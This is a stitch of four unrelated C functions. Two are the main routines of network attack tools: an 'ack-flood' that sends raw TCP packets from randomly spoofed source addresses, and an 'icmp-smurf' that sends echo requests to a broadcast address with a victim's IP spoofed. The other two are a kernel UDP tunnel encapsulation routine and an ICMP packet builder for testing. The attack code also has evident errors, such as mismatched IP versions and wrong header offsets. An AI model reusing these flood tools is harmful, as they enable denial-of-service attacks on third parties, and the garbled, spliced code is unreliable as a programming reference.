// Arguments standarized and checked // // Respects executable [[--source-addr saddr] [--[remote|broadcast]-addr raddr] [--source-port sport] [--remote-port rport] [--n N]] /Y int main(int argc,char* argv[]){ srand(time(NULL)); if(argc!=7){fprintf(stdout,"Usage: ack-flood --remote-addr raddr --remote-port rport --n N\n"); exit(0);} else{ /** Example source address and source port **/ char* source_address = generate_random_ip_v4(); // Randomize source_address for this flood // char* source_port = "1338"; // Randomize port // char* remote_address = argv[2]; char* remote_port = argv[4]; unsigned int iter = atoi(argv[6]); /** Obtain the socket**/ int sock = get_socket_descriptor_raw_tcp(); /** Create buffer for your packets **/ char buffer[DEFAULT_PCKT_LEN]; memset(buffer,0,DEFAULT_PCKT_LEN); /**Init sockaddr_in with my network information (Only if it's necessary, there are functions in applications that spoofs your addr)**/ struct sockaddr_in myaddr; set_sockaddr_in(&myaddr,source_address,source_port); /** Create your headers and make your combinations **/ IP_HEADER *ip_hdr = (IP_HEADER *)buffer; TCP_HEADER *tcp_hdr = (TCP_HEADER *)(buffer + sizeof(IP_HEADER)); /** Fill your headers (IP && TCP in this case) **/ set_ip_header(ip_hdr,IP_VERSION_V6,IP_DEFAULT_IHL,IP_CURRENT_TOS,IP_DEFAULT_IDENTIFICATION,0,0,0,\ IP_DEFAULT_FRAGMENT_OFFSET,IP_DEFAULT_TTL,IP_TCP_PROTOCOL,0,source_address,remote_address,0); /** Use auxiliar functions to warn of current status **/ SHOW_CREATED_IP_HEADER(ip_hdr); set_tcp_header(tcp_hdr,source_port,remote_port,0,0,TCP_DEFAULT_OFFSET,TCP_DEFAULT_RESERVED,0,0,0,0,1,0,0,0, \ TCP_DEFAULT_WINDOW,0,0,buffer); SHOW_CREATED_TCP_HEADER(tcp_hdr); /** Notice the kernel that we doesn't need it fill the header **/ if(kernel_not_fill_my_header(sock)<0){fprintf(stderr,"Is not possible to notice the kernel"); exit(0);} /** Run your application type (Syn flood in this case)**/ run_flood(sock,iter,ip_hdr,&myaddr,buffer); } return 0; }
//http://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml // Arguments standarized and checked // // Respects executable [--source-addr saddr --[remote|broadcast]-addr raddr --source-port sport [--remote-port rport] [--n N]] // int main(int argc,char* argv[]){ if(argc!=9){fprintf(stdout,"Usage: icmp-smurf --source-addr saddr --broadcast-addr baddr --source-port sport --n N\n"); exit(0);} else{ /** Example source address and source port **/ char* source_address = argv[2]; char* source_port = argv[6]; char* broadcast_address = argv[4]; int iterations = atoi(argv[8]); /** Obtain the socket**/ int sock = get_socket_descriptor_raw_tcp(); /** Create buffer for your packets **/ char buffer[DEFAULT_PCKT_LEN]; memset(buffer,0,DEFAULT_PCKT_LEN); /**Init sockaddr_in with my network information (Only if it's necessary, there are functions in applications that spoofs your addr)**/ struct sockaddr_in myaddr; set_sockaddr_in(&myaddr,source_address,source_port); /** Create your headers and make your combinations **/ IP_HEADER *ip_hdr = (IP_HEADER *)buffer; ICMP_HEADER *icmp_hdr = (ICMP_HEADER *)(buffer + sizeof(ICMP_HEADER)); /** Fill your headers (IP && TCP in this case) **/ set_ip_header(ip_hdr,IP_VERSION_V6,IP_DEFAULT_IHL,IP_CURRENT_TOS,IP_DEFAULT_IDENTIFICATION,0,0,0,\ IP_DEFAULT_FRAGMENT_OFFSET,IP_DEFAULT_TTL,IP_ICMP_PROTOCOL,0,source_address,broadcast_address,0); /** Use auxiliar functions to warn of current status **/ SHOW_CREATED_IP_HEADER(ip_hdr); set_icmp_header(icmp_hdr,ICMP_ECHO,0,0,0); SHOW_CREATED_ICMP_HEADER(icmp_hdr); /** Notice the kernel that we doesn't need it fill the header **/ if(kernel_not_fill_my_header(sock)<0){fprintf(stderr,"Is not possible to notice the kernel"); exit(0);} /** Application (Send icmp requests to broadcast addr with victim ip spoofed) **/ int count = 0,i; #pragma omp parallel for reduction(+:count) if(iterations>=2000000) for(i=0;i<iterations;i++){ if(sendto(sock, buffer, ip_hdr->total_length, 0, (struct sockaddr*)&myaddr, sizeof(myaddr))>=0) count++; } fprintf(stdout,"Send %d icmp echo to broadcast %s\n",count,broadcast_address); } return 0; }
//int encap(struct sk_buff *skb, struct tun_param *tp, unsigned int mark, struct ka_payload *kap){ int encap(struct sk_buff *skb, struct tun_param *tp, unsigned int mark, struct ka_payload *kap){ struct sk_buff *new_skb; struct iphdr *old_iph; //struct iphdr *iph; struct net_device *dev; int ret = 0; struct sock tmpsk; struct udphdr *udph; u32 saddr, daddr; u16 sport, dport; struct rtable *rt; struct flowi4 fl4; unsigned int pushroom, piggyroom; piggyroom = 0; if(kap->tid == 0) piggyroom = 0; else piggyroom = PIGGYROOM; pushroom = HEADROOM + piggyroom; old_iph = get_IP_header(skb); daddr = tp->tr.addr; sport = tp->tl.port; dport = tp->tr.port; // since 2.6.36 rtable no longer has rt_src attribute, now I get source address from the device (Sander) dev = dev_get_by_index(upmtns->net_ns, tp->tl.ifindex); if (!dev) { dmesge("no device found during encap"); return -1; } saddr = get_dev_ip_address(dev, NULL, 0); // since 2.6.39 ip_route_output_key flowi parameter has been replaced with flowi4, rtable no longer has rt_src attribute // ip_route_output_key function now returns an rtable and should be replaced with ip_route_output_ports (Sander) tmpsk.sk_mark = mark; rt = ip_route_output_ports(dev_net(dev), &fl4, &tmpsk, daddr, 0, 0, 0, IPPROTO_IP, RT_TOS(old_iph->tos), tp->tl.ifindex); if (!rt) { dmesge("encap - no rtable found during encap"); ret = -1; goto end; } if (skb_headroom(skb) < pushroom || skb_shared(skb) || (skb_cloned(skb) && !skb_clone_writable(skb, 0))) { new_skb = skb_realloc_headroom(skb, pushroom); printk(" --- socket buffer REALLOCATION\n"); if (!new_skb) { dmesge("encap - can not realloc skb room"); ret = -1; goto end; } if (skb->sk) skb_set_owner_w(new_skb, skb->sk); dev_kfree_skb_any(skb); skb = new_skb; old_iph = ip_hdr(skb); } if(piggyroom > 0){ skb_push(skb, PIGGYROOM); //print_ka_info(kap->info); memcpy(skb->data, kap, sizeof(struct ka_payload)); skb_push(skb, HEADROOM); } else{ //printk("Creating normal packet...\n"); skb_push(skb, HEADROOM); } skb_reset_network_header(skb); memset(&(IPCB(skb)->opt), 0, sizeof(IPCB(skb)->opt)); IPCB(skb)->flags &= ~(IPSKB_XFRM_TUNNEL_SIZE | IPSKB_XFRM_TRANSFORMED | IPSKB_REROUTED); skb_dst_drop(skb); // since 2.6.36 rtable has no 'u' attribute, you can use dst directly (Sander) skb_dst_set(skb, &rt->dst); set_ip_header(skb, old_iph, saddr, daddr, piggyroom); set_udp_header(skb, old_iph, sport, dport, piggyroom); nf_reset(skb); // since 2.6.36 rtable has no 'u' attribute, you can use dst directly (Sander) ip_select_ident(ip_hdr(skb), &rt->dst, NULL); skb->mark = mark; //useless... /*************/ udph = get_UDP_header(skb); //dmesg("ENCAP ---> UDP src: %u dst: %u mark: %u", ntohs(udph->source), ntohs(udph->dest),skb->mark); end: dev_put(dev); return ret; }
struct packet *new_icmp_packet(int address_family, enum direction_t direction, const char *type_string, const char *code_string, int protocol, u32 tcp_start_sequence, u32 payload_bytes, s64 mtu, char **error) { s32 type = -1; /* bad type; means "unknown so far" */ s32 code = -1; /* bad code; means "unknown so far" */ struct packet *packet = NULL; /* the newly-allocated result packet */ /* Calculate lengths in bytes of all sections of the packet. * For now we only support the most common ICMP message * format, which includes at the end the original outgoing IP * header and the first 8 bytes after that (which will * typically have the port info needed to demux the message). */ const int ip_fixed_bytes = ip_header_len(address_family); const int ip_option_bytes = 0; const int ip_header_bytes = ip_fixed_bytes + ip_option_bytes; const int echoed_bytes = ip_fixed_bytes + ICMP_ECHO_BYTES; const int icmp_bytes = icmp_header_len(address_family) + echoed_bytes; const int ip_bytes = ip_header_bytes + icmp_bytes; /* Sanity-check all the various lengths */ if (ip_option_bytes & 0x3) { asprintf(error, "IP options are not padded correctly " "to ensure IP header is a multiple of 4 bytes: " "%d excess bytes", ip_option_bytes & 0x3); goto error_out; } assert((ip_header_bytes & 0x3) == 0); /* Parse the ICMP type and code */ if (parse_icmp_type_and_code(address_family, type_string, code_string, &type, &code, error)) goto error_out; assert(is_valid_u8(type)); assert(is_valid_u8(code)); /* Allocate and zero out a packet object of the desired size */ packet = packet_new(ip_bytes); memset(packet->buffer, 0, ip_bytes); packet->ip_bytes = ip_bytes; packet->direction = direction; packet->flags = 0; packet->ecn = 0; /* Set IP header fields */ const enum ip_ecn_t ecn = ECN_NONE; set_packet_ip_header(packet, address_family, ip_bytes, direction, ecn, icmp_protocol(address_family)); /* Find the start of the ICMP header and then populate common fields. */ void *icmp_header = packet_start(packet) + ip_header_bytes; if (set_packet_icmp_header(packet, icmp_header, address_family, type, code, mtu, error)) goto error_out; /* All ICMP message types currently supported by this tool * include a copy of the outbound IP header and the first few * bytes inside. To ensure that the inbound ICMP message gets * demuxed to the correct socket in the kernel, here we * construct enough of a basic IP header and during test * execution we fill in the port numbers and (if specified) * TCP sequence number in the TCP header. */ u8 *echoed_ip = packet_echoed_ip_header(packet); const int echoed_ip_bytes = (ip_fixed_bytes + layer4_header_len(protocol) + payload_bytes); set_ip_header(echoed_ip, address_family, echoed_ip_bytes, reverse_direction(direction), ecn, protocol); if (protocol == IPPROTO_TCP) { u32 *seq = packet_echoed_tcp_seq(packet); *seq = htonl(tcp_start_sequence); } return packet; error_out: if (packet != NULL) packet_free(packet); return NULL; }